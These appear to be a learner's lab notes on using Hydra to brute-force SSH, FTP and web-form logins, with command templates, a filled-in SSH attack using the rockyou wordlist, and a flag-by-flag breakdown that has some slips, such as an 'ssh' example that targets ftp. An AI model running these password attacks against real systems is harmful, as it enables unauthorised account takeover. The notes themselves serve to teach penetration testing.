
Installed on Kali by default. Used to bruteforce usernames / password by iterating through a list.

Formatting calls

Format depends on the type of service we are hitting. For example, ssh looks like this:

    hydra -l user -P passlist.txt ftp://MACHINE_IP


SSH call hydra -l <username> -P <full path to pass> -t 4 ssh

   -l   # For username 
   -P   # password list
   -t   # Number of threads to use
   -V   # Verbose output
   ssh  # Using ssh

Making an actual call:

hydra -l molly -P /usr/share/wordlists/rockyou.txt $ipadd -t 4 ssh

Post Web Form

hydra -l <username> -P <wordlist> http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V

Breaking that down becomes

    -l  # single username 
    -P  # Password list
    http-post-form  # Type of form (post)
    /login url  # The login page URL
    :username   # Form field for username
    ^USER^      # Tell it to use username here
    password    # form field for password
    ^PASS^      # Use password list supplied earlier
    Login       # indicates the Login failed message
    Login failed    # login failure message returned 
    F=incorrect # If message appears, login failed
    -V verbose output